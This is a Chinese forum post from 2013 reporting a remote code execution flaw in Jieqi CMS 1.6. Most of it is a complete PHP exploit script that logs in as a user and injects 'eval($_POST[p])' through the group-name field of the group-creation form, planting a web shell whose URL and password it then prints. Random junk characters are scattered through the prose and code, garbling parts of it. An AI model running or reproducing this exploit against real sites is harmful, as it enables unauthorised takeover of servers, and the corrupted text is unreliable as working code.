杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。: E- X+ e/ o4 r7 Y7 v p
% C U3 g+ x" f
1 ]" q* `+ e) J' { Q该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
! [# B9 q8 q9 C$ V 需要有一个能创建圈子的用户。 F, q( N& T/ E7 ^) q) M# w1 H
+ x1 t7 `& P" `* w+ L
<?php
0 a1 D. i' H' q - \: S6 a7 _' @) o# K
print_r('
5 r7 o# p. P) G' N4 h: N$ l+---------------------------------------------------------------------------+/ ~' d S5 J4 b% _8 H* X( V
Jieqi CMS V1.6 PHP Code Injection Exploit
3 X0 Q* Q% w& @! ~6 lby flyh4t
+ }6 T/ ^5 Z# P* imail: phpsec at hotmail dot com; Y$ U+ ?: J9 g' L1 e, Y/ X
team: http://www.wolvez.org
9 ~' i3 r* ~" _ J+---------------------------------------------------------------------------+
$ w, z6 _/ v B6 s/ n' R'); /**4 }! h l; X8 [) j4 v2 n6 H6 @1 E
* works regardless of php.ini settings' Z5 X# a% E4 E- | A
*/ if ($argc < 5) { print_r(', u& e2 f: J+ k# h* N' F
+---------------------------------------------------------------------------+, M1 T9 a; L o7 }* O# g
Usage: php '.$argv[0].' host path username' B. ?' M* |$ `5 t; f2 X* ^# B
host: target server (ip/hostname)! y0 R7 n7 _. N( \$ w
path: path to jieqicms
* ]4 m* m5 o5 s1 Duasename: a username who can create group
\& c6 s# O5 r# R$ L* V) Q" QExample:2 O6 [; x/ L- ^& d/ K! L: r* ]
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
% n- d+ F3 r0 F K% j+---------------------------------------------------------------------------+
6 M! P K$ A; N3 S'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961! Q! c- i; v- ~
Content-Disposition: form-data; name="gname"# h' r; n4 g; R6 [- l& i. x
' e9 ?4 Y- N$ m+ T0 M7 J B- p
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t$ R& [ `/ ?7 z& r/ U" _: ~( w
-----------------------------23281168279961
- l" y" F" t4 ^9 YContent-Disposition: form-data; name="gcatid"0 @6 d! c- u1 c z( f/ C
1 _9 l3 C, j5 F# F% K5 G
1% E6 ]9 a, @7 `
-----------------------------23281168279961+ {, H9 a9 r9 D2 z1 i3 c
Content-Disposition: form-data; name="gaudit"% y6 \5 _; u" h4 b
* p$ R& u- v9 u! W" y2 C7 x- Z10 C N$ \* u$ F. f8 k
-----------------------------23281168279961
% B2 M. |2 k: B8 K4 U7 ]; Q8 d5 `Content-Disposition: form-data; name="gbrief"+ M8 T0 [4 x+ _+ _7 W
& q, q% `. [/ y& y$ r1 g8 b9 O+ I1 \$ F" r$ s. z% X/ F
-----------------------------23281168279961--, @6 T2 m; z9 L
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com6 y# a3 w8 b$ X, y+ ]
' [! Y. `9 ^: o# } X3 x' Ypreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对